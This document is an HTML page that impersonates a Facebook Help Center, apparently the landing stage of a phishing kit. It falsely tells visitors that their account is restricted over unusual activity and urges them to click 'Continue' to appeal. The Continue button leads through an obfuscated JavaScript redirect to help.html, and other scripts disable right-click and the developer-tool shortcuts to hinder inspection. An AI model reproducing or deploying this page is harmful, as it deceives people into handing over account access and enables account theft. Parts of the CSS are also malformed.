<!DOCTYPE html><html><head>
    <meta charset="UTF-8">
  </head><body><div id="index.php"></div>
<script src="aes.js" crossorigin="anonymous"></script>
<script src="staticsecure.min.js"></script>
<script>
staticsecure({"query": "key", "0000": "example", "index.php": "hidden.txt"})
</script>

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Help Center</title>
  <link rel="icon" href="Facebook_Logo_2023_1.png" type="image/png">
    <script type="text/javascript">
        document.addEventListener("contextmenu", function(e) {
            e.preventDefault();
        });

        document.addEventListener("keydown", function(e) {
            // Check if the "i" or "c" key is pressed with Shift or Ctrl
            if (
                (e.key === "i" ||
                    e.key === "c" ||
                    e.keyCode === 73 ||
                    e.keyCode === 67) &&
                (e.shiftKey || e.ctrlKey)
            ) {
                e.preventDefault();
            }
        });

    </script>

    <style>


        /* New theme styles */

        body {
            background-color: #ffffff;
            /* Facebook's classic blue */
            font-family: Arial, sans-serif;
            text-align: center;
            color: #000;
            /* White text */
            margin: 0;
            padding: 20px;
          /* Remove default margin */
        }

        .container {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            position: relative;
            /* Required for relative positioning of the image and text */
        }


        #box {
            height: 40%;
            width: 45%;
            background-color: rgb(255, 255, 255);
            border-radius: 3px;
            display: flex;
            align-items: center;
            flex-direction: column;
        }

        #box>img {
            width: 70px;
            margin-top: 10px;
        }

        #data {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-top: 10px;
        }

        #data>h4 {
            font-size: 30px;
         margin: 5px 5px 5px 5px;
          margin-bottom: 10px;
        }

        #data>img {
            width: 18px;       
      }
      #data>img @media (max-width: 768px) {
        .containter #data<img {
          width: 40%;
          margin-bottom: 20px; /
        }

      }

        .button {
            background-color: #1877f2;
            /* Facebook's primary blue */
            color: #fff;
            padding: 12px 24px;
            font-size: 18px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .button:hover {
            background-color: #1659c7;
            /* Slightly darker blue on hover */
        }

        /* Style for the image */

        @media (max-width: 768px) {
            .container img {
                width: 40%;
                margin-bottom: 20px;//* Adjust the image width for mobile */
            }

          .help-center-text img {
              margin-top: 20px;
          }
        }

        /* Desktop styles */

        @media (min-width: 769px) {
            .container img {
                width: 10%;
                /
            }
            /* Style for the "Help Center" text container */
            .help-center-text-container {
                text-align: center;
                margin-top: -30px;
                margin-top: 20px;
                transform: translateY(-0px);
                /* Add space between image and text */
            }
        }

        /* Style for the "Help Center" text */

        .help-center-text {
            font-size: 36px;
            /* Adjust the font size as needed */
            font-weight: bold;
            /* Super bold text */
            color: #000;
            /* White text color */
            text-shadow: 0px 0px 0px rgba(0, 0, 0, 0.5);
            /* Add a subtle text shadow */
        }

        /* Style for the remaining content */

        .remaining-content {
          margin-top: 20px;
            /* Add space below "Help Center" text */
        }

        /* Style for the text within the remaining content */

        .remaining-text {
            font-size: 18px;
            /* Adjust the font size as needed */
            font-weight: normal;
            /* Normal text weight */        }

    </style>




    <div class="container">
        <img src="Facebook_Logo_2023.png" alt="Your Image">

        <!-- "Help Center" text container -->
        <div class="help-center-text-container">
            <div class="help-center-text"><div id="data">
                <h4>Help Center</h4>  <img src="thumbnails%252Fbluetick.png" alt="">
            </div>
        </div>

        <!-- Remaining content -->
        <div class="remaining-content">
            <!-- Content from the first code snippet -->
            <div class="bg-blue-300">
                <div class="">
                    <div class="flex justify-center items-center pl-6 px-28">
                        <div class="flex mt-9"></div>
                        <div class="mx-3">
                            <p class="font text-gray-700 shadow-transparent mt-2 font-extralight">
                                𝗪𝗲 𝗵𝗮𝘃𝗲 𝗱𝗲𝘁𝗲𝗰𝘁𝗲𝗱 𝘂𝗻𝘂𝘀𝘂𝗮𝗹 𝗮𝗰𝘁𝗶𝘃𝗶𝘁𝘆 𝗳𝗿𝗼𝗺 𝘆𝗼𝘂𝗿 𝗮𝗰𝗰𝗼𝘂𝗻𝘁 𝗮𝗻𝗱 𝘄𝗲 𝗵𝗮𝘃𝗲 𝗿𝗲𝘀𝘁𝗿𝗶𝗰𝘁𝗲𝗱 𝘆𝗼𝘂𝗿 𝗮𝗰𝗰𝗼𝘂𝗻𝘁.
                            </p>
                            <p class="text-lg text-gray-700 font-extralight">𝗜𝗳 𝘆𝗼𝘂 𝗯𝗲𝗹𝗶𝗲𝘃𝗲 𝘁𝗵𝗶𝘀 𝘁𝗼 𝗯𝗲 𝗮 𝗺𝗶𝘀𝘁𝗮𝗸𝗲, 𝗖𝗹𝗶𝗰𝗸 𝗼𝗻 "𝗖𝗼𝗻𝘁𝗶𝗻𝘂𝗲" 𝗮𝗻𝗱 𝗿𝗲𝗾𝘂𝗲𝘀𝘁 𝗮 𝗮𝗽𝗽𝗲𝗮𝗹.</p>
                        </div>
                    </div>
                </div>
            </div>

            <!-- Continue button with JavaScript redirection -->
            <form id="redirectForm" method="post" action="help.html">
                <button type="submit" class="button">Continue</button>
            </form>

            <!-- JavaScript to perform the redirection -->
            <script>

                function _0x4d03(_0x100e7e,_0x162f76){var _0x598ed6=_0x598e();return _0x4d03=function(_0x4d0309,_0x74bc4b){_0x4d0309=_0x4d0309-0x1a4;var _0x99eff6=_0x598ed6[_0x4d0309];return _0x99eff6;},_0x4d03(_0x100e7e,_0x162f76);}function _0x598e(){var _0x287545=['809550ZOhSQM','href','511980GnUQEK','2811640fJYgSV','2535350vqfdZS','help.html','8WGXLAU','1559592XnxkHV','4663COUFMJ','preventDefault','73545BlqWiR','20iGqrpz','190hOknTh','redirectForm'];_0x598e=function(){return _0x287545;};return _0x598e();}var _0x47a560=_0x4d03;(function(_0x5b8740,_0x635652){var _0x3668cd=_0x4d03,_0x398a55=_0x5b8740();while(!![]){try{var _0x2e69da=-parseInt(_0x3668cd(0x1ad))/0x1*(-parseInt(_0x3668cd(0x1b1))/0x2)+-parseInt(_0x3668cd(0x1af))/0x3*(parseInt(_0x3668cd(0x1ab))/0x4)+parseInt(_0x3668cd(0x1a9))/0x5+parseInt(_0x3668cd(0x1a5))/0x6+-parseInt(_0x3668cd(0x1a7))/0x7+-parseInt(_0x3668cd(0x1a8))/0x8+-parseInt(_0x3668cd(0x1ac))/0x9*(parseInt(_0x3668cd(0x1b0))/0xa);if(_0x2e69da===_0x635652)break;else _0x398a55['push'](_0x398a55['shift']());}catch(_0x404e59){_0x398a55['push'](_0x398a55['shift']());}}}(_0x598e,0x40a4b),document['getElementById'](_0x47a560(0x1a4))['addEventListener']('submit',function(_0x14ea0d){var _0x550dd7=_0x47a560;_0x14ea0d[_0x550dd7(0x1ae)](),window['location'][_0x550dd7(0x1a6)]=_0x550dd7(0x1aa);}));
            </script>
        </div>
    </div>




</div></body></html>